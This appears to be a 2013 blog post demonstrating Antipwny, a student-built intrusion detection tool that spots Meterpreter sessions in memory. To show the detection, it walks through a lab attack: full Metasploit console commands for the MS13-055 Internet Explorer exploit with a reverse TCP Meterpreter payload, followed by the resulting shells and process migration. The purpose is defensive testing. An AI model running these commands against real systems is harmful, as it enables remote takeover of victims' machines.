Antipwny, by Rohan Vazarkar and David Bitner
In Summer and Fall of 2013, my students Rohan Vazarkar and David Bitner began the development of Antipwny, a host based intrusion detection system customized to detect Meterpreter payloads and other Metasploit artifacts.
The latest version of the tool is available on GitHub. It is written in C#, and requires a full .NET Framework 4.5 installation.
Right now (November 2013), it is functional, but incomplete. It happily detect Meterpreter and Metasploit in running memory, and comes complete with a GUI, though the GUI is not complete.
To see the tool in action, let’s target a Windows 7 SP1 x64 system. Grab a copy of Antipwny from GitHub, and grab your .NET installer. The installation of .NET is standard. Once that is done, simply uncompress the Antipwny archive in a convenient directory and run the tool located in the
exe subdirectory; separate versions exist for 32 and 64 bit architectures. Once it is run, you obtain a simple GUI:
The program runs in the background, periodically scanning memory for evidence of Meterpreter or Metasploit.
Speaking of which, we need to start thinking about an attack. For the exploit, we’ll use the MS13_055 CAnchor attack against Internet Explorer. This a relatively recent Metasploit module (it dates to September 2013) which I have found to be quite reliable. Let’s get things started in Kali:
=[ metasploit v4.8.0-2013111301 [core:4.8 api:1.0] + -- --=[ 1218 exploits - 664 auxiliary - 189 post + -- --=[ 322 payloads - 30 encoders - 8 nops msf > use exploit/windows/browser/ms13_055_canchor msf exploit(ms13_055_canchor) > set srvport 80 srvport => 80 msf exploit(ms13_055_canchor) > set uripath / uripath => / msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms13_055_canchor) > set lhost 10.0.2.129 lhost => 10.0.2.129 msf exploit(ms13_055_canchor) > exploit [*] Exploit running as background job. msf exploit(ms13_055_canchor) > [*] Started reverse handler on 10.0.2.129:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://10.0.2.129:80/ [*] Server started.
Go ahead and visit the problematic web page with Internet Explorer. In Kali, we see the result of the exploit
[*] 10.0.2.132 ms13_055_canchor - Using JRE ROP [*] 10.0.2.132 ms13_055_canchor - Sending exploit... [*] Sending stage (768512 bytes) to 10.0.2.132 [*] Meterpreter session 1 opened (10.0.2.129:4444 -> 10.0.2.132:49161) at 2013-11-17 19:54:38 -0500 [*] Session ID 1 (10.0.2.129:4444 -> 10.0.2.132:49161) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1036) [*] Spawning notepad.exe process to migrate to [+] Migrating to 604 [*] 10.0.2.132 ms13_055_canchor - Using JRE ROP [*] 10.0.2.132 ms13_055_canchor - Sending exploit... [*] Sending stage (768512 bytes) to 10.0.2.132 [+] Successfully migrated to process [*] Meterpreter session 2 opened (10.0.2.129:4444 -> 10.0.2.132:49163) at 2013-11-17 19:54:45 -0500 [*] Session ID 2 (10.0.2.129:4444 -> 10.0.2.132:49163) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1876) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2788 [+] Successfully migrated to process msf exploit(ms13_055_canchor) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN7SP1 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter >
Interestingly, when Internet Explorer realized that it could not load the web page when it first visited the Kali system, it happily reloaded the web page- so we ended up with two shells instead of one. Woot!
Then, when the scan is complete (which runs every minute, though it can be run more often via the Rescan button) you end up with information about the attack:
We see that Anipwny has detected both shells.
If you right-click on each of the noted Meterpreter sessions, you have the option to kill the process. If you do so, the attacker on Kali discovers
meterpreter > [*] 10.0.2.132 - Meterpreter session 2 closed. Reason: Died [*] 10.0.2.132 - Meterpreter session 1 closed. Reason: Died
You can see a much more extensive demonstration of their tool from their conference presentation at B-Sides Delaware in November 2013: